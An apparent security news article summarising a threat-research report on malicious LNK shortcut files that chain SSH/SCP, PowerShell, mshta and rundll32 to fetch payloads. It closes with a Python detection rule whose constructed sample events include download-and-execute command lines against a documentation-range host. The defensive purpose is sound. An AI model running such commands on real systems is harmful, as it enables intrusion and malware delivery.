Attackers' tradecraft keeps growing more sophisticated, and one notable recent trend is the use of malicious LNK files, disguised as harmless shortcuts, that carry SSH commands. This combination has drawn the attention of security researchers, in particular Cyble Research and Intelligence Labs (CRIL), which has reported a marked increase in the use of LNK files as an infection vector in 2024.
The Shift in Attack Vectors: LNK Files as an Entry Point
CRIL’s investigation highlights a significant shift in the methods used by attackers, who are now leveraging LNK files to gain access to targeted systems. These shortcut files, typically designed to link to specific applications or locations on a computer, are often disguised as innocuous documents. When unsuspecting users execute these files, they trigger a series of malicious actions that can lead to the deployment of advanced malware, allowing cybercriminals to establish a foothold within the compromised environment.
This growing reliance on LNK files as a delivery mechanism reflects a broader evolution in the tactics of threat actors, who aim to circumvent traditional security measures, including antivirus programs and endpoint detection and response (EDR) solutions.
Living-Off-the-Land Binaries (LOLBins) and Evasion Techniques
Among the primary techniques employed in these LNK-based attacks is the exploitation of Living-off-the-Land Binaries (LOLBins). These trusted system binaries, which are already integrated into the operating system for legitimate purposes, can be manipulated by cybercriminals to execute harmful commands without the need for external malware. In many cases, attackers utilize various LOLBins to download or execute additional malicious payloads, further advancing their attack chain.
Despite the advancements in EDR solutions designed to detect suspicious activities involving LOLBins, attackers have refined their methods to evade detection. This underscores the necessity for organizations to adopt more sophisticated detection mechanisms capable of identifying the malicious use of trusted system utilities.
SSH Commands in Malicious LNK Files: A New Layer of Sophistication
Recent campaigns have also revealed an intriguing development: the incorporation of SSH commands within malicious LNK files. Traditionally employed for secure communication between systems, SSH commands have been weaponized by attackers to establish persistent connections, execute malicious payloads, and maintain control over compromised systems.
CRIL’s research has identified several campaigns where SSH commands, particularly those utilizing the Secure Copy Protocol (SCP), have been embedded within LNK files. This allows attackers to download malicious files from remote servers to a compromised system, where they can be executed to further the attack. The use of SSH for such operations is particularly concerning, as it is not commonly associated with Windows systems, enabling these activities to go unnoticed by conventional security measures.
Exploiting PowerShell and CMD Through SSH
In addition to file downloads via SCP, threat actors have also leveraged SSH commands to indirectly execute malicious PowerShell or CMD commands from LNK files. These commands can be configured to load and execute additional payloads or abuse other system utilities. One notable attack observed by CRIL involved a malicious LNK file that triggered a PowerShell script via an SSH command; the script then called mshta.exe to download a malicious payload from a remote URL. This sequence culminated in the deployment of harmful files on the compromised system.
Moreover, attackers have utilized cmd.exe and rundll32 commands to load and execute malicious DLL files, complicating detection efforts. In one instance, a series of commands executed via the LNK file led to the opening of a PDF document containing a lure, which, when accessed, activated malicious code.
Tactics Employed by Advanced Persistent Threat (APT) Groups
As the sophistication of these attacks continues to escalate, Advanced Persistent Threat (APT) groups are increasingly incorporating SSH-based techniques into their operations. Renowned for their targeted and long-term cyber espionage activities, these groups demonstrate a continual refinement of their attack methods through the use of LNK files and SSH commands. The Transparent Tribe, a notable APT group, has been linked to the deployment of stealer malware using similar techniques, often compiling malicious payloads in Go to enhance their stealth.
The Need for Vigilance and Enhanced Detection
The convergence of LNK files and SSH commands poses a significant threat to organizations globally. As attackers refine their strategies, security teams must implement robust monitoring and detection capable of identifying abnormal activity, particularly the malicious use of trusted system binaries. EDR solutions must evolve to recognize the subtle indicators of malicious SSH and SCP activity, especially in environments where SSH is not normally used. By closely monitoring legitimate SSH utilities and restricting their use to authorized personnel, organizations can reduce the risk of abuse. Furthermore, disabling optional features such as the OpenSSH client on systems where they are not required helps minimize the attack surface.
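The parent/child process patterns described in the article (the OpenSSH client launched by explorer.exe, as a double-clicked LNK would do; ssh.exe spawning a script host; mshta.exe given a remote URL) can be expressed as a simple detection rule. The example below is added here and is not from the Cyble report or any vendor product; the Sysmon-style Event ID 1 records, file paths, host names and the 203.0.113.x addresses are constructed for illustration.

```python
import re

# Windows OpenSSH client binaries and the process that launches double-clicked LNK files
SSH_CLIENTS = {"ssh.exe", "scp.exe"}
LNK_LAUNCHERS = {"explorer.exe"}
# Script/host binaries the report says were chained behind the SSH command
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe"}

# Constructed sample of Sysmon EID 1 process-creation records, reduced to the fields the rule needs.
SAMPLE_EVENTS = [
    {"ProcessId": 4200, "Image": r"C:\Windows\System32\OpenSSH\scp.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"scp.exe user@203.0.113.5:update.dll C:\Users\Public\update.dll"},
    {"ProcessId": 4300, "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "ssh.exe user@203.0.113.5"},
    {"ProcessId": 4310, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": r"powershell.exe -File C:\Users\Public\stage.ps1"},
    {"ProcessId": 4320, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "mshta.exe http://203.0.113.5/lure.hta"},
    # Benign: an administrator using ssh from a terminal (constructed path); must not be flagged
    {"ProcessId": 5100, "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "ParentImage": r"C:\Program Files\WindowsTerminal\WindowsTerminal.exe",
     "CommandLine": "ssh.exe admin@jumphost.corp.example"},
]

def _name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the names of the rules one process-creation event matches (empty if benign)."""
    image, parent = _name(event["Image"]), _name(event["ParentImage"])
    cmd = event["CommandLine"].lower()
    hits = []
    if image in SSH_CLIENTS and parent in LNK_LAUNCHERS:
        hits.append("ssh_client_launched_from_explorer")
    if parent in SSH_CLIENTS and image in SCRIPT_HOSTS:
        hits.append("script_host_spawned_by_ssh")
    if image == "mshta.exe" and re.search(r"https?://", cmd):
        hits.append("mshta_remote_url")
    return hits

def scan(events):
    """Run every rule over a batch of events; returns (ProcessId, rule) pairs."""
    return [(e["ProcessId"], rule) for e in events for rule in evaluate(e)]

if __name__ == "__main__":
    for pid, rule in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The rule keys on the immediate parent, so a shortcut that runs the SSH client through an intermediate cmd.exe needs a grandparent lookup; in environments where SSH is not used at all, any execution of ssh.exe or scp.exe is itself worth an alert.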